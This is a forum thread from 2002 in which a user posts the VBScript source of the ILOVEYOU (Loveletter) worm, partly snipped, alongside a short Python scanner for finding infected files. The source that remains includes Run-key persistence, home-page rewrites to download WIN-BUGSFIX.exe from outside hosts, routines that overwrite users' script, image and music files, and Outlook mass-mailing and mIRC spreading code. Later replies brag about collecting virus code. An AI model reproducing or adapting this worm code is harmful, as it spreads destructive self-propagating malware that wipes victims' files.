
Thread: Pick this S-H-I-T apart...

  1. #1

    Thread Starter
    PowerPoster MidgetsBro's Avatar
    Join Date
    Oct 2000
    Location
    Apparently, Internet.com
    Posts
    3,125

    Pick this S-H-I-T apart...

    My ex-girlfriend just got this virus, and she was kind enough to copy the code to a text file and send it to me. If anyone wants to pick this apart, have fun, and maybe figure out how to cure it so I don't have to reformat her hard drive...
    WARNING! VIRUS! DO NOT RUN!
    VB Code:
    1. 'Rem  barok -loveletter(vbe) <i hate go to school>
    2. 'Rem             by: spyder  /  [email][email protected][/email]  /  @GRAMMERSoft Group  /  Manila,Philippines
    3. 'On Error Resume Next
    4. 'Dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow
    5. 'eq = ""
    6. 'ctr = 0
    7. 'Set fso = CreateObject("Scripting.FileSystemObject")
    8. 'Set file = fso.OpenTextFile(WScript.ScriptFullName, 1)
    9. 'vbscopy = file.ReadAll
    10. 'main()
    11. 'Sub main()
    12. 'On Error Resume Next
    13. 'Dim wscr, rr
    14. 'Set wscr = CreateObject("WScript.Shell")
    15. 'rr = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
    16. 'If (rr >= 1) Then
    17. 'wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
    18. 'End If
    19.  
    20. '[color=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color]
    21.  
    22. 'html()
    23. 'spreadtoemail()
    24. 'listadriv()
    25. 'End Sub
    26. 'Sub regruns()
    27. 'On Error Resume Next
    28. 'Dim num, downread
    29. 'regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
    30. 'regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
    31. 'downread = ""
    32. 'downread = regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
    33. 'If (downread = "") Then
    34. 'downread = "c:\"
    35. 'End If
    36. 'if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
    37. 'Randomize
    38. 'num = Int((4 * Rnd) + 1)
    39. 'If num = 1 Then
    40. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
    41. 'ElseIf num = 2 Then
    42. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
    43. 'ElseIf num = 3 Then
    44. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
    45. 'ElseIf num = 4 Then
    46. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
    47. 'End If
    48. 'End If
    49.  
    50. '[color=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color]
    51.  
    52. 'End Sub
    53. 'Sub listadriv()
    54. 'On Error Resume Next
    55. 'Dim d, dc, s
    56. 'Set dc = fso.Drives
    57. 'For Each d In dc
    58. 'If d.DriveType = 2 Or d.DriveType = 3 Then
    59. 'folderlist(d.path&"\")
    60. 'End If
    61. 'Next
    62. 'listadriv = s
    63. 'End Sub
    Last edited by MidgetsBro; Apr 26th, 2002 at 01:30 AM.

  2. #2

    Thread Starter
    PowerPoster MidgetsBro's Avatar
    Join Date
    Oct 2000
    Location
    Apparently, Internet.com
    Posts
    3,125
    The Rest of it...
    VB Code:
    1. 'Sub infectfiles(folderspec)
    2. 'On Error Resume Next
    3. 'Dim f, f1, fc, ext, ap, mircfname, s, bname, mp3
    4. 'Set f = fso.GetFolder(folderspec)
    5. 'Set fc = f.Files
    6. 'For Each f1 In fc
    7. 'ext = fso.GetExtensionName(f1.Path)
    8. 'ext = LCase(ext)
    9. 's = LCase(f1.Name)
    10. 'If (ext = "vbs") Or (ext = "vbe") Then
    11. 'Set ap = fso.OpenTextFile(f1.Path, 2, True)
    12. 'ap.write vbscopy
    13. 'ap.Close
    14. 'ElseIf (ext = "js") Or (ext = "jse") Or (ext = "css") Or (ext = "wsh") Or (ext = "sct") Or (ext = "hta") Then
    15. 'Set ap = fso.OpenTextFile(f1.Path, 2, True)
    16. 'ap.write vbscopy
    17. 'ap.Close
    18. 'bname = fso.GetBaseName(f1.Path)
    19. 'Set cop = fso.GetFile(f1.Path)
    20. 'cop.copy(folderspec&"\"&bname&".vbs")
    21. 'fso.DeleteFile (f1.Path)
    22. 'ElseIf (ext = "jpg") Or (ext = "jpeg") Then
    23. 'Set ap = fso.OpenTextFile(f1.Path, 2, True)
    24. 'ap.write vbscopy
    25. 'ap.Close
    26. 'Set cop = fso.GetFile(f1.Path)
    27. 'cop.copy(f1.path&".vbs")
    28. 'fso.DeleteFile (f1.Path)
    29. 'ElseIf (ext = "mp3") Or (ext = "mp2") Then
    30. 'set mp3=fso.CreateTextFile(f1.path&".vbs")
    31. 'mp3.write vbscopy
    32. 'mp3.Close
    33. 'Set att = fso.GetFile(f1.Path)
    34. 'att.Attributes = att.Attributes + 2
    35. 'End If
    36. 'If (eq <> folderspec) Then
    37. 'If (s = "mirc32.exe") Or (s = "mlink32.exe") Or (s = "mirc.ini") Or (s = "script.ini") Or (s = "mirc.hlp") Then
    38. 'set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
    39. 'scriptini.WriteLine "[script]"
    40. 'scriptini.WriteLine ";mIRC Script"
    41. 'scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will"
    42. 'scriptini.WriteLine "     corrupt... WINDOWS will affect and will not run correctly. thanks"
    43. 'scriptini.WriteLine ";"
    44. 'scriptini.WriteLine ";Khaled Mardam-Bey"
    45. 'scriptini.WriteLine ";[url]http://www.mirc.com[/url]"
    46. 'scriptini.WriteLine ";"
    47. 'scriptini.WriteLine "n0=on 1:JOIN:#:{"
    48. 'scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
    49.  
    50. '[COLOR=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color]
    51.  
    52. 'Sub regcreate(regkey, regvalue)
    53. 'Set regedit = CreateObject("WScript.Shell")
    54. 'regedit.RegWrite regkey, regvalue
    55. 'End Sub
    56. 'Function regget(value)
    57. 'Set regedit = CreateObject("WScript.Shell")
    58. 'regget = regedit.RegRead(value)
    59. 'End Function
    60. 'Function fileexist(filespec)
    61. 'On Error Resume Next
    62. 'Dim msg
    63. 'If (fso.FileExists(filespec)) Then
    64. 'msg = 0
    65. 'Else
    66. 'msg = 1
    67. 'End If
    68. 'fileexist = msg
    69. 'End Function
    70. 'Function folderexist(folderspec)
    71. 'On Error Resume Next
    72. 'Dim msg
    73. 'If (fso.GetFolderExists(folderspec)) Then
    74. 'msg = 0
    75. 'Else
    76. 'msg = 1
    77. 'End If
    78. 'fileexist = msg
    79. 'End Function
    80. 'Sub spreadtoemail()
    81. 'On Error Resume Next
    82. 'Dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad
    83. 'Set regedit = CreateObject("WScript.Shell")
    84. 'Set out = WScript.CreateObject("Outlook.Application")
    85. 'Set mapi = out.GetNameSpace("MAPI")
    86. 'For ctrlists = 1 To mapi.AddressLists.Count
    87. 'Set a = mapi.AddressLists(ctrlists)
    88. 'x = 1
    89. 'regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)
    90. 'If (regv = "") Then
    91. 'regv = 1
    92. 'End If
    93. 'If (Int(a.AddressEntries.Count) > Int(regv)) Then
    94. 'For ctrentries = 1 To a.AddressEntries.Count
    95. 'malead = a.AddressEntries(x)
    96. 'regad = ""
    97. 'regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead)
    98. 'If (regad = "") Then
    99. 'Set male = out.CreateItem(0)
    100. 'male.Recipients.Add (malead)
    101. 'male.Subject = "ILOVEYOU"
    102. 'male.Body = vbcrlf&"kindly check the attached LOVELETTER
    103.  
    104. '[color=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color]
    105.  
    106. 'Sub html()
    107. 'On Error Resume Next
    108. 'Dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6
    109. 'dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
    110. '"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? [email][email protected][/email] ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
    111. '"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
    112. '"<?-?HEAD><BODY ONMOUSEOUT=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
    113. '"ONKEYDOWN=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
    114. '"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
    115. '"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
    116. '"<?-?BODY><?-?HTML>"&vbcrlf& _
    117. '"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
    118. '"<!--?-??-?"&vbcrlf& _
    119. '"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
    120. '"?-??-?-->"&vbcrlf& _
    121. '"<?-?SCRIPT>"&vbcrlf& _
    122. '"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
    123. '"<!--"&vbcrlf& _
    124. '"on error resume next"&vbcrlf& _
    125. '"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
    126. '"aw=1"&vbcrlf& _
    127. '"code="
    128. 'dta2="set fso=CreateObject(@[email protected]@-@)"&vbcrlf& _
    129. '"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
    130. '"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
    131. '"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
    132. '"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
    133. '"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
    134. '"wri.write code4"&vbcrlf& _
    135. '"wri.close"&vbcrlf& _
    136. '"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
    137. '"if (err.number=424) then"&vbcrlf& _
    138. '"aw=0"&vbcrlf& _
    139. '"end if"&vbcrlf& _
    140. '"if (aw=1) then"&vbcrlf& _
    141. '"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
    142. '"window.close"&vbcrlf& _
    143. '"end if"&vbcrlf& _
    144. '"end if"&vbcrlf& _
    145. '"Set regedit = CreateObject(@[email protected]@-@)"&vbcrlf& _
    146. '"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
    147. '"?-??-?-->"&vbcrlf& _
    148. '"<?-?SCRIPT>"
    149. 'dt1 = Replace(dta1, Chr(35) & Chr(45) & Chr(35), "'")
    150. 'dt1 = Replace(dt1, Chr(64) & Chr(45) & Chr(64), """")
    151. 'dt4 = Replace(dt1, Chr(63) & Chr(45) & Chr(63), "/")
    152. 'dt5 = Replace(dt4, Chr(94) & Chr(45) & Chr(94), "\")
    153. 'dt2 = Replace(dta2, Chr(35) & Chr(45) & Chr(35), "'")
    154. 'dt2 = Replace(dt2, Chr(64) & Chr(45) & Chr(64), """")
    155. 'dt3 = Replace(dt2, Chr(63) & Chr(45) & Chr(63), "/")
    156. 'dt6 = Replace(dt3, Chr(94) & Chr(45) & Chr(94), "\")
    157. 'Set fso = CreateObject("Scripting.FileSystemObject")
    158. 'Set c = fso.OpenTextFile(WScript.ScriptFullName, 1)
    159. 'lines = Split(c.ReadAll, vbCrLf)
    160. 'l1 = UBound(lines)
    161. 'For n = 0 To UBound(lines)
    162. 'lines(n) = Replace(lines(n), "'", Chr(91) + Chr(45) + Chr(91))
    163. 'lines(n) = Replace(lines(n), """", Chr(93) + Chr(45) + Chr(93))
    164. 'lines(n) = Replace(lines(n), "\", Chr(37) + Chr(45) + Chr(37))
    165. 'If (l1 = n) Then
    166. 'lines(n) = Chr(34) + lines(n) + Chr(34)
    167. 'Else
    168. 'lines(n) = Chr(34) + lines(n) + Chr(34) & "&vbcrlf& _"
    169. 'End If
    170. 'Next
    171. 'Set b = fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM")
    172. 'b.Close
    173. 'Set d = fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM", 2)
    174. 'd.write dt5
    175. 'd.write Join(lines, vbCrLf)
    176. 'd.write vbCrLf
    177. 'd.write dt6
    178. 'd.Close
    179. 'End Sub
    Last edited by MidgetsBro; Apr 26th, 2002 at 01:29 AM.
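
For the clean-up question in post #1, a read-only triage scan built from what the posted code does to files. This is an added example, not part of the original posts; the function names and category labels are assumptions, and the file names and marker strings are the ones visible in the code above.

```python
import os

# Indicators taken from the code posted in this thread.
MARKER = b"barok -loveletter"              # header comment of the script
MIRC_MARKER = b"mirc will corrupt"         # text the worm writes into script.ini
KNOWN_NAMES = {"mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.htm",
               "win-bugsfix.exe", "winfat32.exe"}
OVERWRITTEN = (".jpg.vbs", ".jpeg.vbs")    # original overwritten, then deleted
HIDDEN_ORIG = (".mp3.vbs", ".mp2.vbs")     # original left in place, marked hidden
SCRIPT_EXTS = (".vbs", ".vbe")             # js/css/hta etc. end up renamed to .vbs


def head(path, size=65536):
    """Read the first bytes of a file, lower-cased, without executing it."""
    try:
        with open(path, "rb") as fh:
            return fh.read(size).lower()
    except OSError:
        return b""


def classify(path):
    """Return (category, note) for one file, or None if nothing matches."""
    name = os.path.basename(path).lower()
    if name in KNOWN_NAMES:
        return ("known-name", "file name referenced in the posted code")
    if name.endswith(HIDDEN_ORIG):
        orig = path[:-4]                   # same path without the added ".vbs"
        found = os.path.exists(orig)
        return ("mp3-sibling", "original still present" if found else "original missing")
    if name.endswith(OVERWRITTEN):
        return ("image-replaced", "original was overwritten; restore from backup")
    if name == "script.ini" and MIRC_MARKER in head(path):
        return ("mirc-script", "script.ini written by the worm")
    if name.endswith(SCRIPT_EXTS) and MARKER in head(path):
        return ("infected-script", "file body replaced by the worm")
    return None


def scan(root):
    """Walk root and return a sorted list of (relative path, category, note)."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(folder, fname)
            verdict = classify(full)
            if verdict:
                hits.append((os.path.relpath(full, root), *verdict))
    return sorted(hits)
```

Run `scan()` against a mounted copy of the drive from a clean machine. The `mp3-sibling` hits are the recoverable ones, since the posted code only sets the hidden attribute on the original .mp3/.mp2 file.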

  3. #3
    I'm about to be a PowerPoster! mendhak's Avatar
    Join Date
    Feb 2002
    Location
    Ulaan Baator GooGoo: Frog
    Posts
    38,170
    NORTON ANTIVIRUS
    soz... Just had to do that.

  4. #4

    Thread Starter
    PowerPoster MidgetsBro's Avatar
    Join Date
    Oct 2000
    Location
    Apparently, Internet.com
    Posts
    3,125
    She has Norton, but they won't let her update her definitions until she pays for the service, which she is not about to do. I personally would rather spend an hour or so reformatting than pay for any type of antivirus software. I told her to get AVG, but she can't figure it out... lol. She's not too bright in the computer department. I think this is the ILOVEYOU virus, and my Norton picked it up when she tried to send it to me... it's pretty much too bad for her, I just thought someone would like to see the virus to see how these dumbass people do it. You've got to be retarded to make a virus like this...

    PS... I'm gonna edit my other posts so that no one has the full virus code...

  5. #5
    I'm about to be a PowerPoster! mendhak's Avatar
    Join Date
    Feb 2002
    Location
    Ulaan Baator GooGoo: Frog
    Posts
    38,170
    Too late. I got this one too.
    Now I have the code for 4. Pretty small, but it's a collection nevertheless.

    Good thing ur editing it. U might've been modded.

  6. #6

    Thread Starter
    PowerPoster MidgetsBro's Avatar
    Join Date
    Oct 2000
    Location
    Apparently, Internet.com
    Posts
    3,125
    Originally posted by mendhak
    Good thing ur editing it. U might've been modded.
    Exactly what I was thinking. Plus, I don't want some more *******s deciding they want to send the virus to more people, and copying the code and just sending it out.
